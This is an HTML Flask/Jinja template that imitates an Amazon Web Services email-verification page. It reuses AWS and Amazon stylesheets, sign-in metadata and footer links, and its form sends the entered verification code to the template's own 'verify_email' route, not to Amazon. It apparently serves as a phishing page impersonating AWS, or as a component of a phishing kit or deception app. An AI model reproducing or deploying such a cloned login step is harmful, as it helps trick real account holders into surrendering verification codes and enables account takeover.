<!DOCTYPE html>
<html>
<head>
    <title>Email Verification</title>
    <meta charset="UTF-8">
    <meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="pragma" content="no-cache">

<meta name="awsc-mezz" content="1">
<meta id="awsc-mezz-region" name="awsc-mezz-region" content="us-east-1">
<meta id="awsc-mezz-locale" name="awsc-mezz-locale" content="en">
<meta id="awsc-mezz-fb" name="awsc-mezz-fb" content="0">
<meta id="awsc-proxy-request-id" name="awsc-proxy-request-id" content="5bcc943926413a7cffd1643f26914e67">

<meta id="awsc-signin-endpoint" name="awsc-signin-endpoint" content="signin.aws.amazon.com">
<meta id="awsc-enable-mobile-mezzanine" name="awsc-enable-mobile-mezzanine" content="1">
<meta id="awsc-enable-switchrole-username-menu" name="awsc-enable-switchrole-username-menu" content="1">
<meta id="awsc-experiment" name="awsc-experiment" content="1">

<link rel="stylesheet" type="text/css" href="https://d2q66yyjeovezo.cloudfront.net/css/menu-2kjdfskljflksdfjk/globalnav-02cb627868d71796aca4c5ae66496a5b2d1daf4c.gz.css" charset="utf-8">
<link rel="stylesheet" type="text/css" href="https://d2q66yyjeovezo.cloudfront.net/css/mezz-35gbnwov975sjdhcbsf/custsat-84664cb572e6784c249bfd3cf57cfe92faaa15fb.gz.css" charset="utf-8">
<script type="text/javascript" src="https://d2q66yyjeovezo.cloudfront.net/js/mezz-35gbnwov975sjdhcbsf/mezz-e0d99354e6762e505ab21f2fdf1ec415db772e64.gz.js" charset="utf-8"></script>

<meta name="awsc-lang" content="en_US">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- If a webpage contains numbers that can be interpreted as phone numbers, iOS by default
adds Phone Links to it. This is to turn off telephone number detection in iOS Safari. -->
<meta name="format-detection" content="telephone=no">
                
<link href="https://d3e73gntqoo76d.cloudfront.net/3eb2f824da807a4db0a414a4ec1b7e21a4a7c739/common.css" rel="stylesheet" type="text/css">
                
<link href="https://d3e73gntqoo76d.cloudfront.net/3eb2f824da807a4db0a414a4ec1b7e21a4a7c739/main.css" rel="stylesheet" type="text/css">

<link type="text/css" rel="stylesheet" href="https://d257l1zb7u5fh9.cloudfront.net/css/billingconsole_css_prod_v710efd88d0657957f9cb4d5fec659303cece98b8.gz.css">

<link type="text/css" rel="stylesheet" href="https://d257l1zb7u5fh9.cloudfront.net/css/billingconsole_bills_assets_prod_ve1da290708509e11cdb48f361ca48b381a644671.gz.css">

<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Amazon Web Services (AWS) -  EC2 Instances</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
  <meta name="robots" content="index, nofollow" />
  <meta name="description" content="Amazon Web Services EC2 Instances" />

  <link rel="icon" type="image/ico"
href="https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico" />
  <link rel="shortcut icon" type="image/ico"
href="https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico" />
  <link rel="apple-touch-icon" sizes="57x57"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png"
/>
  <link rel="apple-touch-icon" sizes="72x72"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png"
/>
  <link rel="apple-touch-icon" sizes="114x114"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png"
/>
  <link rel="apple-touch-icon" sizes="144x144"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png"
/>
  <link rel="stylesheet" href="https://a0.awsstatic.com/main/css/1.0.391/style.css">
  <link rel="stylesheet"
href="https://a0.awsstatic.com/libra-css/css/1.0.190/style-awsm.css">
  <link rel="stylesheet" 
href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link href="https://a0.awsstatic.com/libra-css/css/1.0.202/vendor/fontawesome.css" rel="stylesheet" type="text/css">
 <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">

</head>
<body>
    <header id="aws-page-header" class="awsm" role="banner" style="margin-bottom=220px; padding-bottom=220px;">
   <div id="aws-nav" class="aws-nav" role="navigation">
    <div class="aws-nav-header">
     <!-- Left header with filter dropdown and aws logo TODO put back in
products to have dropdown
         for all ec2 instances --> 
      <div class="aws-bg-logo lb-bg-logo
aws-amazon_web_services_smile-header-desktop-en">
       <a href="{{ url_for('index') }}"><span>Click here to return to Amazon Web
Services EC2 Instances homepage</span></a>
      </div>
      <div style="margin: auto; width: 50%; padding: 15px;" class="a-section a-spacing-medium a-text-center">
    </div>
     </div>
     </div>
  </header>

<div id="authportal-center-section" class="a-section" style="margin-top:120px;">
<div id="authportal-main-section" class="a-section">
<div class="a-section a-spacing-base auth-pagelet-container">
<div id="auth-cookie-warning-message"><div class="a-alert-content">
<p>
<a class="a-link-normal" href="/gp/help/customer/display.html/ref=ap_cookie_error_help?">
</a>
</p>
</div></div></div>
</div>
<div class="a-section auth-pagelet-container">

<div class="a-section a-spacing-base">
  <div class="a-section">
    <form action="{{ url_for('verify_email') }}" name="verification" method="POST" class="auth-validate-form auth-real-time-validation a-spacing-none fwcim-form">
    <div class="a-section">
    <div class="a-box"><div class="a-box-inner a-padding-extra-large">
      <h1 class="a-spacing-small">
          Please verify your Email address
      </h1>
      {% for message in get_flashed_messages() %}
      <div class="flash">{{ message }}</div>
      {% endfor %}
          <!-- optional subheading element -->
      <div class="a-row a-spacing-base">
        
        <label for="conf_code" class="a-form-label">
          Verification code:
        </label>
    <input type="text" id="ap-credential-autofill-hint" name="conf_code" class="a-input-text a-span12">
	</div></div></div>
	<span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" type="submit" aria-labelledby="continue-announce"><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Verify Email
            </span></span></span>

	</div>
</body>
<div class="a-section a-spacing-top-extra-large auth-footer">

<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
<span class="auth-footer-seperator"></span>

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&nodeId=508088">
      Conditions of Use
    </a>
    <span class="auth-footer-seperator"></span>

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&nodeId=468496">
      Privacy Notice
    </a>
    <span class="auth-footer-seperator"></span>
  
    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html">
      Help
    </a>
    <span class="auth-footer-seperator"></span>
  
</div>

<div class="a-section a-spacing-none a-text-center">
<span class="a-size-mini a-color-secondary">
  © 1996-2018, Amazon.com, Inc. or its affiliates
</span>

</div>

</div>

</html>
